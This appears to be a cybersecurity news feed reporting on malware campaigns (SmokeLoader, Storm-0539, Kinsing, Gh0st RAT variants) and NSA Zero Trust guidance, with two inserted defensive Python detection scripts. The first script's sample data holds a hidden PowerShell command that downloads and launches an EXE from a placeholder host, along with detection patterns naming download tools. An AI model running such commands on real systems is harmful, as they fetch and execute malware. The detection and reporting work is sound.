CYBERSECURITY / DEFENSE / INTELLIGENCE

  • The platform could be a popular remote-work solution for Space Systems Command.


  • The United States is surrendering ground to Russia and China’s propaganda machines. That has key officials increasingly worried.


  • The MITRE Corporation has revealed that the cyber attack targeting the not-for-profit company towards late December 2023 by exploiting zero-day flaws in Ivanti Connect Secure (ICS) involved the actor creating rogue virtual machines (VMs) within its VMware environment. “The adversary created their own rogue VMs within the VMware environment, leveraging compromised vCenter Server access,” MITRE


  • The House will vote on a proposal to study the question as part of the 2025 defense authorization bill.


  • Threat actors have been observed making use of fake websites masquerading as legitimate antivirus solutions from Avast, Bitdefender, and Malwarebytes to propagate malware capable of stealing sensitive information from Android and Windows devices. “Hosting malicious software through sites which look legitimate is predatory to general consumers, especially those who look to protect their devices


  • In multiple aggressive phishing campaigns, the financially motivated group UAC-0006 has heavily targeted Ukraine, using ZIP and RAR attachments to distribute the SMOKELOADER malware.

    The most recent attacks involve emails carrying Microsoft Access files and ZIP archives that, when opened, install malware such as RMS and TALESHOT on the compromised systems.

    Ukraine's government computer emergency response team, CERT-UA, observed this notable resurgence of activity by the financially motivated group UAC-0006.

    Overview Of Recent Activities For UAC-0006

    According to CERT-UA reports, attackers have launched at least two campaigns to disseminate the SMOKELOADER malware as of May 21, 2024.


    SmokeLoader mostly affects Windows-based devices. Once it has infected a computer, it tries to install other malware on it (such as ransomware, cryptominers, or password stealers).

    It might also corrupt files, steal confidential information, and create other problems.

    The recent attacks use emails with a ZIP archive that may contain the following:

    • An .IMG disk image file containing EXE files.
    • Microsoft Access (ACCDB) documents with macros that run a PowerShell command to download and launch the EXE file.

    As before, once the initial compromise succeeds, RMS, TALESHOT, and other malicious tools are loaded onto the machine.
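    A defender's view of the chain above (Access document, macro, PowerShell download, EXE launch), as an added example that is not from CERT-UA or any vendor: a small scorer for process-creation telemetry. The event format (parent image, child image, command line, pipe-separated) and the sample events are constructed for the example.

```python
"""Added example (not from CERT-UA or any vendor): flag the ACCDB-macro -> PowerShell ->
EXE chain from the notice in process-creation telemetry. The sample events are constructed."""
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style events: parent image | child image | child command line.
SAMPLE_EVENTS = [
    r'MSACCESS.EXE|powershell.exe|powershell -w hidden -ep bypass -c "iwr http://example.invalid/a.exe -OutFile $env:TEMP\a.exe; Start-Process $env:TEMP\a.exe"',
    r'MSACCESS.EXE|msaccess.exe|msaccess.exe /decompile',
    r'explorer.exe|powershell.exe|powershell -c Get-Date',
    r'WINWORD.EXE|cmd.exe|cmd /c dir',
    r'MSACCESS.EXE|cmd.exe|cmd /c powershell -enc SQBFAFgA',
]

OFFICE_PARENTS = {"msaccess.exe", "winword.exe", "excel.exe"}
SHELLS = {"powershell.exe", "pwsh.exe", "cmd.exe"}
DOWNLOAD_RE = re.compile(r"\b(iwr|invoke-webrequest|downloadfile|downloadstring|start-bitstransfer|curl|wget)\b|https?://", re.I)
EVASION_RE = re.compile(r"-(enc|encodedcommand|e)\s+[A-Za-z0-9+/=]{8,}|-w(indowstyle)?\s+hidden|-ep\s+bypass", re.I)
LAUNCH_RE = re.compile(r"start-process|\bstart\s+\S*\.exe|&\s*['\"$]", re.I)

def parse(line: str) -> Dict[str, str]:
    """Split one constructed event into its three fields (images lower-cased)."""
    parent, child, cmd = line.split("|", 2)
    return {"parent": parent.lower(), "child": child.lower(), "cmd": cmd}

def score(ev: Dict[str, str]) -> int:
    """0 = irrelevant; higher = closer to the macro-driven download-and-run chain."""
    if ev["parent"] not in OFFICE_PARENTS or ev["child"] not in SHELLS:
        return 0
    s = 1                                          # an Office app spawning a shell at all
    s += int(ev["parent"] == "msaccess.exe")       # the Access (ACCDB) lure named in the notice
    s += 2 * int(bool(DOWNLOAD_RE.search(ev["cmd"])))  # fetches something from the network
    s += int(bool(EVASION_RE.search(ev["cmd"])))   # hidden window, bypass, encoded command
    s += int(bool(LAUNCH_RE.search(ev["cmd"])))    # and then executes a payload
    return s

def detect(lines: List[str], threshold: int = 3) -> List[Tuple[int, str, str]]:
    """Return (score, parent, command line) for events at or above threshold, strongest first."""
    hits = []
    for line in lines:
        ev = parse(line)
        s = score(ev)
        if s >= threshold:
            hits.append((s, ev["parent"], ev["cmd"]))
    return sorted(hits, reverse=True)

if __name__ == "__main__":
    for s, parent, cmd in detect(SAMPLE_EVENTS):
        print(f"score={s} parent={parent} cmd={cmd[:70]}")
```

    The threshold is deliberately low so that an Access process launching an encoded PowerShell command is surfaced even before any download is seen.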

    Several hundred compromised PCs are currently in the bot network. CERT-UA anticipates an increase in fraud via remote banking systems shortly.

    Recommendation

    Company managers are therefore advised to strengthen the security of automated accounting workspaces as soon as possible.

    This can be done by reviewing the published indicators of compromise and ensuring that appropriate policies and protection mechanisms are in place.

    SOC Prime Platform provides curated and tested detection algorithms to help defenders avert attacks related to the UAC-0006 adversary activity detailed in the most recent CERT-UA notice.


    The post Hackers Weaponizing Microsoft Access Documents To Execute Malicious Program appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • Gift cards are attractive to hackers since they provide quick monetization for stolen data or compromised systems.

    Gift cards are easy to resell and to convert into cash, which makes them a comparatively low-risk way for threat actors to profit from their illegal activities.

    Microsoft cybersecurity analysts recently discovered that the gift card system is targeted by a threat group known as Storm-0539 (aka Atlas Lion).

    The group adjusts its methods to keep pace with changes across the retail, payment, and related industries.

    Storm-0539’s illicit gift card theft ventures are coordinated via encrypted channels and underground forums.


    Technical Analysis

    The group's operations involve exploiting technical vulnerabilities and running social engineering campaigns to compromise gift card portals, after which the stolen cards are converted into untraceable cash.

    Unlike threat actors who favor large-scale attacks for quick profit, this actor stands out for quietly stealing value through gift cards.

    Storm-0539 is a Morocco-based threat group whose activity escalates ahead of major holidays such as Christmas and New Year's Day.

    Their intrusion attempts accounted for 30% to 60% of the total during summer, autumn, and winter in 2023-2024.

    Storm-0539 has adapted to modern payment card fraud, among other tactics.

    These include phishing, smishing, device registration for MFA bypass, and third-party access used to compromise cloud identities and the gift card portals of retailers, brands, and restaurants.

    Storm-0539 intrusion lifecycle (Source – Microsoft)

    Rather than relying on malware, the group increasingly uses its deep understanding of the cloud to carry out gift card issuance schemes, targeting staff who hold the necessary access privileges.

    Storm-0539’s reconnaissance and ability to leverage cloud environments resemble those of nation-state threat actors, illustrating how espionage methods currently influence financially motivated threat actors.

    Storm-0539 behaves like state-sponsored advanced hacking groups, focusing on cloud software, identities, and access rights to compromise the gift card printing process rather than end users.

    They pose as legitimate organizations in order to obtain free cloud resources that hide their operations.

    Their deception relies on typosquatted websites that mimic U.S. non-profits; they obtain authentic 501(c)(3) IRS letters and use them to approach cloud services that are sponsored for charities.

    The combination of nation-state tradecraft with financial motives represents new threats from actors like Storm-0539 and Octo Tempest.

    The group’s efficiency in creating free trials and compromising cloud services allows them to launch targeted operations with minimal costs.

    Recommendations

    The recommendations provided are:

    • Token protection and least privilege access
    • Phishing-resistant MFA
    • Adopt a secure gift card platform and implement fraud protection solutions
    • Require a secure password change when user risk level is high
    • Educate employees
    • Reset passwords for users associated with phishing and AiTM activity
    • Enable zero-hour auto purge (ZAP) in Microsoft Defender for Office 365
    • Update identities, access privileges, and distribution lists to minimize attack surfaces


    The post Microsoft Warns Of Storm-0539’s Aggressive Gift Card Theft appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • The scalability and flexibility of cloud platforms have recently fueled the emerging trend of cryptomining attacks in the cloud.

    Unlike on-premises infrastructure, where scaling up resources is difficult, cloud environments let attackers rapidly deploy resources for cryptomining, which makes exploitation easier.

    One of the most common threats in cloud cryptomining is the "Kinsing" malware.

    Cybersecurity researchers recently discovered that Kinsing has been actively attacking vulnerable Apache Tomcat servers.


    Technical Analysis

    Kinsing, a longstanding malware family, specializes in Linux-based cloud infrastructure and gains unauthorized access by exploiting vulnerabilities.

    In most cases, the operators behind Kinsing use compromised systems to install backdoors or cryptominers.

    Once Kinsing infects a system, it uses the system's resources for cryptomining, leading to increased costs and reduced server performance.

    The latest findings show that the group has been attacking Apache Tomcat servers with Kinsing and, for persistence, hiding it in the filesystem under innocent-looking file locations.

    These campaigns exploit flaws in containers and servers to install malicious backdoors and cryptominers.

    In this instance, many servers were infected simultaneously within one environment, including an Apache Tomcat server with severe vulnerabilities.

    Apache Tomcat, an open-source server that publishes static content to the public, is a tempting target for Kinsing perpetrators.

    To remain hidden, the Kinsing malware uses an uncommon trick: it places itself as a file in locations on the system where one would never think of looking.

    It was found in four locations:

    • /var/cache/man/cs/cat1/ (where user command manpages are normally cached)
    • /var/cache/man/cs/cat3/ (where library function manpages are normally cached)
    • /var/lib/gssproxy/rcache/ (no description)
    • /var/cache/man/zh_TW/cat8/ (where sysadmin command manpages are cached; here an extra Taiwan/Chinese locale directory structure had been added)

    The assumption is that defenders rarely take a critical look at 'man' or 'manual' page directories and dummy locale folders for malicious files, which makes them ideal hiding spots for Kinsing.

    To evade discovery, the Kinsing malware is hidden within areas where legitimate system files are usually found.

    Attackers increase the chances of their malware being unnoticed on compromised systems by using such innocent-looking routes.
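    A hunting script for exactly these four locations, as an added example that is not from the article or any vendor: anything in a man-page cache or the gssproxy rcache that carries an ELF header, an executable bit, or a shebang does not belong there. The sample directory tree, including the file names, is constructed so the script runs offline.

```python
"""Added example (not from the article or any vendor): hunt for executables planted in
the man-page cache and gssproxy rcache directories the article names as Kinsing hideouts."""
import os
import stat
import tempfile
from pathlib import Path
from typing import List, Optional, Tuple

# The four locations reported in the article, relative to the scanned root.
KINSING_HIDEOUTS = ["var/cache/man/cs/cat1", "var/cache/man/cs/cat3",
                    "var/lib/gssproxy/rcache", "var/cache/man/zh_TW/cat8"]
ELF_MAGIC = b"\x7fELF"
EXEC_BITS = stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH

def classify(path: Path) -> Optional[str]:
    """Label a file that does not belong in a man cache or rcache; None if it looks benign."""
    with path.open("rb") as fh:
        head = fh.read(4)
    if head.startswith(ELF_MAGIC):
        return "elf-binary"      # cached man pages and rcache entries are never ELF
    if path.stat().st_mode & EXEC_BITS:
        return "exec-bit-set"    # nothing in these directories should be executable
    if head.startswith(b"#!"):
        return "script-shebang"  # a script dropped as a 'cat page'
    return None

def scan(root: Path) -> List[Tuple[str, str]]:
    """Walk the hideout directories under root; return sorted (relative path, label) pairs."""
    findings = []
    for rel in KINSING_HIDEOUTS:
        base = root / rel
        if not base.is_dir():
            continue
        for dirpath, _, files in os.walk(base):
            for name in files:
                p = Path(dirpath) / name
                if p.is_symlink():       # follow nothing; report only regular files
                    continue
                label = classify(p)
                if label:
                    findings.append((p.relative_to(root).as_posix(), label))
    return sorted(findings)

def build_sample_tree() -> Path:
    """Constructed fixture: a legitimate gzip cat page, a planted ELF, and an executable script."""
    root = Path(tempfile.mkdtemp(prefix="kinsing-hunt-"))
    for rel in KINSING_HIDEOUTS:
        (root / rel).mkdir(parents=True)
    (root / "var/cache/man/cs/cat1/ls.1.gz").write_bytes(b"\x1f\x8b\x08" + bytes(16))
    (root / "var/cache/man/zh_TW/cat8/misc.8").write_bytes(ELF_MAGIC + b"\x02\x01\x01" + bytes(9))
    script = root / "var/lib/gssproxy/rcache/cron.sh"
    script.write_text("#!/bin/sh\n")
    script.chmod(0o755)
    return root

if __name__ == "__main__":
    for path, label in scan(build_sample_tree()):   # scan(Path("/")) on a real host
        print(f"{label:14} {path}")
```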

    The detected malicious file was not new; it was first seen in China in late 2022.

    However, this specific attack on the Tomcat server began in mid-2023, with file creation dates from June to July 2023, which means over a year of undetected malicious operation.

    The malware uses the old version 6.12.2 of the XMRig cryptominer, which mines the privacy-focused Monero cryptocurrency; the current version, 6.21.2, is already available for download on GitHub.


    The post Kinsing Malware Attacking Apache Tomcat Server With Vulnerabilities appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • Zero Trust Maturity measures the extent to which an organization has adopted and implemented the Zero Trust security model.

    It gauges how fully a company has adopted Zero Trust's foundational concepts, such as strong authentication of every user, device, and application.

    Recently, the NSA released guidance on Zero Trust maturity for securing applications from attackers.

    Guidance On Zero Trust Maturity

    The NSA released a Cybersecurity Information Sheet (CSI) on advancing Zero Trust maturity for the application and workload pillar.

    It provides recommendations for progressively achieving "never trust, always verify" capabilities, such as securing applications from unauthorized access and continuously monitoring workloads, under a comprehensive Zero Trust framework.


    The goal is to continually mature cybersecurity protections, responses, and operations over time through Zero Trust implementation efforts.

    NSA's Dave Luber stated:

    “This guidance disrupts malicious cyber activity by applying granular access control and visibility to applications and workloads in modern networks. Implementing Zero Trust better secures sensitive data, apps, assets, and services.” 

    The CSI notes that applications are programs and services executing on-premises or in the cloud, while workloads are standalone solutions or coupled processing components performing mission functions; under Zero Trust the two are mutually dependent.

    Application security prevents exceptions to an application's or system's security policies.

    The application/workload Zero Trust pillar secures access at the application layer by integrating user, device, network, and environment capabilities to prevent unauthorized access or tampering with critical processes/services. 

    In advanced ZT, users strongly authenticate to apps and networks, while apps have reduced attack surfaces and least privilege controls.

    Workloads dynamically segregate components with granular access rules between them. 

    Key capabilities include application inventory, secure development/integration, software risk management, resource authorization/integration, and continuous monitoring/authorizations. 

    This enhances visibility, reduces risks, and mitigates application threats under Zero Trust.

    Application and workload pillar maturity (Source – Defense.gov)

    The National Security Agency (NSA) has been actively helping the Department of Defense (DoD) agencies pilot and implement the Zero Trust architectures on their networks.

    At the same time, the agency is also developing detailed guidelines for incorporating fundamental Zero Trust principles and models into company-wide system designs.


    The post NSA Releases Guidance On Zero Trust Maturity To Secure Application From Attackers appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.


  • Hackers target military and government networks for varied reasons, primarily espionage, which can extend to interfering with the functioning of critical infrastructure.

    This is mainly because these networks hold sensitive data and command systems; tampering with them can deal a severe blow to national security, whether through the collection of intelligence or by gaining an upper hand in wartime.

    Bitdefender Labs recently analyzed a chain of cyber-attacks on high-profile organizations in South China Sea countries, revealing a previously unknown threat actor that probably acted on China's behalf.

    The investigation spanned several years and covered at least eight military and government victims dating back to 2018; the attackers used a range of methods and tools, such as Gh0st RAT variants and .NET payloads, amounting to something of a cyber-espionage museum.


    Technical Analysis

    The most unsettling finding is that the attackers repeatedly regained access to systems through weak passwords or a failure to update them.

    Even after comparing numerous artifacts, it was impossible to attribute their activity, spanning more than five years, to any known state actor.

    Attribution of "Unfading Sea Haze" was complicated: because the researchers found no match with known actors, they labeled the group as new.

    Their emphasis on South China Sea targets and their use of Gh0st RAT variants suggest investigating possible Chinese links.

    An APT41 technique involving SharpJSHandler that had some commonalities but no other resemblance indicated shared practices within the Chinese cyber ecosystem.

    These hints show an advanced threat actor who may have ties to China. Consequently, more research is needed.

    Unfading Sea Haze regained access via spear-phishing emails containing malicious ZIP archives with LNK files posing as documents.

    The second stage, a SerialPktdoor backdoor payload, ran evasion routines that checked for and bypassed ESET processes.

    More recent lures imitated a Microsoft Defender installation or relied on political themes, embedding LNK files for fileless attacks triggered via MSBuild, which made it possible to run code entirely in memory from remote SMB servers with no traces left on the victims' computers.

    This was enabled by the clever use of legitimate tools such as MSBuild to remain hidden.

    For persistence, the attackers preferred scheduled tasks named after legitimate executable files.

    They began with Gh0st RAT versions such as SilentGh0st and InsidiousGh0st for several years before moving to modular variants like FluffyGh0st and leveraging fileless techniques via MSBuild.exe and remote shares.

    The evolution and different variations of the Gh0st RAT (Source – BitDefender)

    Their tooling also included browser data stealers aimed at Chrome, Firefox, and Edge, USB and WPD device monitoring, and keyloggers.

    Messaging apps were targeted, with compression tools used for manual collection of recently accessed files.

    Exfiltration evolved from the custom DustyExfilTool to curl over TLS and then to FTP with frequently changing credentials, suggesting that the group's operational security posture has matured.

    All of this shows that these spies were focused on information collection.

    Recommendations

    The recommendations are:

    • Vulnerability Management
    • Strong Authentication
    • Proper Network Segmentation
    • Multilayered Defense
    • Network Traffic Monitoring
    • Effective Logging
    • Detection and Response
    • Collaboration and Information Sharing
    • Advanced Threat Intelligence


    The post Chinese Hackers Stay Hidden On Military And Government Networks For Six Years appeared first on GBHackers on Security | #1 Globally Trusted Cyber Security News Platform.
